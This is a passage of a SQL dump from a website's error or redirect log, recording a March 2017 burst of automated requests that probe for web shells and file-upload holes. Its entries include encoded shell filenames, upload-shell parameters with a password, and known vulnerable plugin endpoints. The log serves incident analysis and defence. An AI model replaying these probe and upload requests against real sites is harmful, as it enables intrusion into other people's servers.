00:00:00'),(7413,'http://www.hallcrestheights.org/robots.txt.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:36:04','0000-00-00 00:00:00'),(7414,'http://www.hallcrestheights.org/jconfig.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:36:24','0000-00-00 00:00:00'),(7415,'http://www.hallcrestheights.org/media/reads.php?z3=TUxlUlhyLnBocA==&z4=L21lZGlhLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:36:25','0000-00-00 00:00:00'),(7416,'http://www.hallcrestheights.org/media/1ndex.php?z3=TUxlUlhyLnBocA==&z4=L21lZGlhLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:36:28','0000-00-00 00:00:00'),(7417,'http://www.hallcrestheights.org/sql_dump.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:36:30','0000-00-00 00:00:00'),(7418,'http://www.hallcrestheights.org/images/laj.php?z3=TUxlUlhyLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:36:33','0000-00-00 00:00:00'),(7419,'http://www.hallcrestheights.org/media/404.php?z3=TUxlUlhyLnBocA==&z4=L21lZGlhLw==',NULL,'www.hallcrestheights.org','',1,0,'2017-03-10 12:36:38','0000-00-00 00:00:00'),(7420,'http://www.hallcrestheights.org/media/tmp.php?z3=TUxlUlhyLnBocA==&z4=L21lZGlhLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:37:48','0000-00-00 00:00:00'),(7421,'http://www.hallcrestheights.org/r3x.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:37:50','0000-00-00 00:00:00'),(7422,'http://www.hallcrestheights.org/log.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:37:52','0000-00-00 00:00:00'),(7423,'http://www.hallcrestheights.org/images/stories/0day.php?z3=TUxlUlhyLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:37:53','0000-00-00 00:00:00'),(7424,'http://www.hallcrestheights.org/includes/u2p.php?z3=TUxlUlhyLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:37:55','0000-00-00 00:00:00'),(7425,'http://www.hallcrestheights.org/images/xxx.php?z3=TUxlUlhyLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:37:57','0000-00-00 00:00:00'),(7426,'http://www.hallcrestheights.org/al277.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:37:59','0000-00-00 00:00:00'),(7427,'http://www.hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=TUxlUlhyLnBocA==&z4=L2NhY2hlLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:00','0000-00-00 00:00:00'),(7428,'http://www.hallcrestheights.org/install.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:02','0000-00-00 00:00:00'),(7429,'http://www.hallcrestheights.org/dswat.org/wsdl.php?z3=TUxlUlhyLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:04','0000-00-00 00:00:00'),(7430,'http://www.hallcrestheights.org/robot.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:05','0000-00-00 00:00:00'),(7431,'http://www.hallcrestheights.org/wsdl.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:07','0000-00-00 00:00:00'),(7432,'http://www.hallcrestheights.org/goog1es.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:09','0000-00-00 00:00:00'),(7433,'http://www.hallcrestheights.org/site/tmp/cTivrC.php?z3=TUxlUlhyLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:10','0000-00-00 00:00:00'),(7434,'http://www.hallcrestheights.org/update.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:12','0000-00-00 00:00:00'),(7435,'http://www.hallcrestheights.org/includes.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:14','0000-00-00 00:00:00'),(7436,'http://www.hallcrestheights.org/wp-main.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:15','0000-00-00 00:00:00'),(7437,'http://www.hallcrestheights.org/news.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:17','0000-00-00 00:00:00'),(7438,'http://www.hallcrestheights.org/images/al277.php?z3=TUxlUlhyLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:18','0000-00-00 00:00:00'),(7439,'http://www.hallcrestheights.org/webconfig.txt.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:20','0000-00-00 00:00:00'),(7440,'http://www.hallcrestheights.org/cache/cachee.php?z3=TUxlUlhyLnBocA==&z4=L2NhY2hlLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:22','0000-00-00 00:00:00'),(7441,'http://www.hallcrestheights.org/thumb.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:23','0000-00-00 00:00:00'),(7442,'http://www.hallcrestheights.org/SessionController.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:26','0000-00-00 00:00:00'),(7443,'http://www.hallcrestheights.org/maill.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:27','0000-00-00 00:00:00'),(7444,'http://www.hallcrestheights.org/error-log.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:29','0000-00-00 00:00:00'),(7445,'http://www.hallcrestheights.org/authenticating.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:31','0000-00-00 00:00:00'),(7446,'http://www.hallcrestheights.org/google-assist.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:36','0000-00-00 00:00:00'),(7447,'http://www.hallcrestheights.org/images/google-assist.php?z3=TUxlUlhyLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:37','0000-00-00 00:00:00'),(7448,'http://www.hallcrestheights.org/images/robots.txt.php?z3=TUxlUlhyLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:39','0000-00-00 00:00:00'),(7449,'http://www.hallcrestheights.org/elements.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:40','0000-00-00 00:00:00'),(7450,'http://www.hallcrestheights.org/xmlsrpc.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:41','0000-00-00 00:00:00'),(7451,'http://www.hallcrestheights.org/wp-cache.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:43','0000-00-00 00:00:00'),(7452,'http://www.hallcrestheights.org/images/404.php?z3=TUxlUlhyLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:45','0000-00-00 00:00:00'),(7453,'http://www.hallcrestheights.org/images/head.php?z3=TUxlUlhyLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:46','0000-00-00 00:00:00'),(7454,'http://www.hallcrestheights.org/cache/support.php?z3=TUxlUlhyLnBocA==&z4=L2NhY2hlLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:48','0000-00-00 00:00:00'),(7455,'http://www.hallcrestheights.org/RoseLeif.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:49','0000-00-00 00:00:00'),(7456,'http://www.hallcrestheights.org/Abbrevsprl.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:51','0000-00-00 00:00:00'),(7457,'http://www.hallcrestheights.org/show.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:53','0000-00-00 00:00:00'),(7458,'http://www.hallcrestheights.org/images/defau1t.php?z3=TUxlUlhyLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:54','0000-00-00 00:00:00'),(7459,'http://www.hallcrestheights.org/cli/40dd1d.php?z3=TUxlUlhyLnBocA==&z4=L2NsaS8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:56','0000-00-00 00:00:00'),(7460,'http://www.hallcrestheights.org/infos.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:38:58','0000-00-00 00:00:00'),(7461,'http://www.hallcrestheights.org/cache/defau1t.php?z3=TUxlUlhyLnBocA==&z4=L2NhY2hlLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:00','0000-00-00 00:00:00'),(7462,'http://www.hallcrestheights.org/bookmark.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:02','0000-00-00 00:00:00'),(7463,'http://www.hallcrestheights.org/configbak.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:03','0000-00-00 00:00:00'),(7464,'http://www.hallcrestheights.org/wp-data.php?z3=TUxlUlhyLnBocA==&z4=Lw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:05','0000-00-00 00:00:00'),(7465,'http://www.hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:06','0000-00-00 00:00:00'),(7466,'http://www.hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:07','0000-00-00 00:00:00'),(7467,'http://www.hallcrestheights.org/wp-content/plugins/myshe.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:09','0000-00-00 00:00:00'),(7468,'http://www.hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:10','0000-00-00 00:00:00'),(7469,'http://www.hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:12','0000-00-00 00:00:00'),(7470,'http://www.hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.hallcrestheights.org','',1,0,'2017-03-10 12:39:33','0000-00-00 00:00:00'),(7471,'http://www.hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:33','0000-00-00 00:00:00'),(7472,'http://www.hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:36','0000-00-00 00:00:00'),(7473,'http://www.hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:37','0000-00-00 00:00:00'),(7474,'http://www.hallcrestheights.org/wp-content/plugins/Analyser.php?z3=TUxlUlhyLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:39','0000-00-00 00:00:00'),(7475,'http://www.hallcrestheights.org/cache/list.php?z3=TUxlUlhyLnBocA==&z4=L2NhY2hlLw==',NULL,'www.hallcrestheights.org','',2,0,'2017-03-10 12:39:41','0000-00-00 00:00:00'),(7476,'http://www.hallcrestheights.org/license.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:42','0000-00-00 00:00:00'),(7477,'http://www.hallcrestheights.org/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:43','0000-00-00 00:00:00'),(7478,'http://www.hallcrestheights.org/up.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:43','0000-00-00 00:00:00'),(7479,'http://www.hallcrestheights.org/m.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:44','0000-00-00 00:00:00'),(7480,'http://www.hallcrestheights.org/ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:44','0000-00-00 00:00:00'),(7481,'http://www.hallcrestheights.org/tmp/guide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:45','0000-00-00 00:00:00'),(7482,'http://www.hallcrestheights.org/media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:45','0000-00-00 00:00:00'),(7483,'http://www.hallcrestheights.org/media/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:46','0000-00-00 00:00:00'),(7484,'http://www.hallcrestheights.org/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:47','0000-00-00 00:00:00'),(7485,'http://www.hallcrestheights.org/nktt.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:47','0000-00-00 00:00:00'),(7486,'http://www.hallcrestheights.org/zibi.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:48','0000-00-00 00:00:00'),(7487,'http://www.hallcrestheights.org/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:48','0000-00-00 00:00:00'),(7488,'http://www.hallcrestheights.org/ws0.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:49','0000-00-00 00:00:00'),(7489,'http://www.hallcrestheights.org/libraries/joomla/web.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:50','0000-00-00 00:00:00'),(7490,'http://www.hallcrestheights.org/active.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:50','0000-00-00 00:00:00'),(7491,'http://www.hallcrestheights.org/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:51','0000-00-00 00:00:00'),(7492,'http://www.hallcrestheights.org/images/stories/s.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:51','0000-00-00 00:00:00'),(7493,'http://www.hallcrestheights.org/images/stories/black.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:52','0000-00-00 00:00:00'),(7494,'http://www.hallcrestheights.org/images/p.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:53','0000-00-00 00:00:00'),(7495,'http://www.hallcrestheights.org/help.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',2,0,'2017-03-10 12:39:55','0000-00-00 00:00:00'),(7496,'http://www.hallcrestheights.org/libraries/respectMuslims.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:55','0000-00-00 00:00:00'),(7497,'http://www.hallcrestheights.org/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:56','0000-00-00 00:00:00'),(7498,'http://www.hallcrestheights.org/tmp/pz.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:56','0000-00-00 00:00:00'),(7499,'http://www.hallcrestheights.org/go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:57','0000-00-00 00:00:00'),(7500,'http://www.hallcrestheights.org/wp-configuration.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:39:59','0000-00-00 00:00:00'),(7501,'http://www.hallcrestheights.org/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:00','0000-00-00 00:00:00'),(7502,'http://www.hallcrestheights.org/libraries/joomla/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:00','0000-00-00 00:00:00'),(7503,'http://www.hallcrestheights.org/images/stories/xsamxadoo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:01','0000-00-00 00:00:00'),(7504,'http://www.hallcrestheights.org/tmp/petx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:01','0000-00-00 00:00:00'),(7505,'http://www.hallcrestheights.org/tmp/bogel.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:02','0000-00-00 00:00:00'),(7506,'http://www.hallcrestheights.org/images/stories/0d4y.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:02','0000-00-00 00:00:00'),(7507,'http://www.hallcrestheights.org/libraries/joomla/wso.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:03','0000-00-00 00:00:00'),(7508,'http://www.hallcrestheights.org/cache/clean.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:03','0000-00-00 00:00:00'),(7509,'http://www.hallcrestheights.org/images/stories/a.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:04','0000-00-00 00:00:00'),(7510,'http://www.hallcrestheights.org/b1.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:04','0000-00-00 00:00:00'),(7511,'http://www.hallcrestheights.org/mide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:05','0000-00-00 00:00:00'),(7512,'http://www.hallcrestheights.org/wp-content/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:05','0000-00-00 00:00:00'),(7513,'http://www.hallcrestheights.org/images/stories/shell.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:06','0000-00-00 00:00:00'),(7514,'http://www.hallcrestheights.org/images/stories/filemga.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:07','0000-00-00 00:00:00'),(7515,'http://www.hallcrestheights.org/images/stories/0day.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:09','0000-00-00 00:00:00'),(7516,'http://www.hallcrestheights.org/default_component.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:09','0000-00-00 00:00:00'),(7517,'http://www.hallcrestheights.org/images/w0rm.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:10','0000-00-00 00:00:00'),(7518,'http://www.hallcrestheights.org/images/sym.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:10','0000-00-00 00:00:00'),(7519,'http://www.hallcrestheights.org/images/wp-mail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:11','0000-00-00 00:00:00'),(7520,'http://www.hallcrestheights.org/media/jmail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:12','0000-00-00 00:00:00'),(7521,'http://www.hallcrestheights.org/images/stories/webroot.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:12','0000-00-00 00:00:00'),(7522,'http://www.hallcrestheights.org/bin/logo_img.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:13','0000-00-00 00:00:00'),(7523,'http://www.hallcrestheights.org/images/upa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:15','0000-00-00 00:00:00'),(7524,'http://www.hallcrestheights.org/images/stories/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:15','0000-00-00 00:00:00'),(7525,'http://www.hallcrestheights.org/images/stories/ali.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:16','0000-00-00 00:00:00'),(7526,'http://www.hallcrestheights.org/hh.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:16','0000-00-00 00:00:00'),(7527,'http://www.hallcrestheights.org/images/stories/gh.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:17','0000-00-00 00:00:00'),(7528,'http://www.hallcrestheights.org/tmp/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:17','0000-00-00 00:00:00'),(7529,'http://www.hallcrestheights.org/images/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:18','0000-00-00 00:00:00'),(7530,'http://www.hallcrestheights.org/images/stories/gass.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:18','0000-00-00 00:00:00'),(7531,'http://www.hallcrestheights.org/up14.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-03-10 12:40:19','0000-00-00 00:00:00'),(7532,'http://www.hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'http://www.hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/udd.php','',1,0,'2017-03-10 12:40:20','0000-00-00 00:00:00'),(7533,'http://www.hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/MLeRXr.php',NULL,'','',1,0,'2017-03-10 12:40:20','0000-00-00 00:00:00'),(7534,'http://www.hallcrestheights.org/wp-admin/admin-ajax.php',NULL,'http://www.hallcrestheights.org/wp-admin/admin-ajax.php','',1,0,'2017-03-10 12:40:21','0000-00-00 00:00:00'),(7535,'http://www.hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/MLeRXr.php',NULL,'','',1,0,'2017-03-10 12:40:22','0000-00-00 00:00:00'),(7536,'http://www.hallcrestheights.org/wp-content/uploads/MLeRXr.php',NULL,'','',1,0,'2017-03-10 12:40:24','0000-00-00 00:00:00'),(7537,'http://www.hallcrestheights.org/uploadify/uploadify.php?folder=/',NULL,'http://www.hallcrestheights.org/uploadify/uploadify.php?folder=/','',1,0,'2017-03-10 12:40:25','0000-00-00 00:00:00'),(7538,'http://www.hallcrestheights.org/MLeRXr.php',NULL,'','',1,0,'2017-03-10 12:40:25','0000-00-00 00:00:00'),(7539,'http://www.hallcrestheights.org/sites/all/libraries/elfinder/php/connector.minimal.php',NULL,'http://www.hallcrestheights.org/sites/all/libraries/elfinder/php/connector.minimal.php','',1,0,'2017-03-10 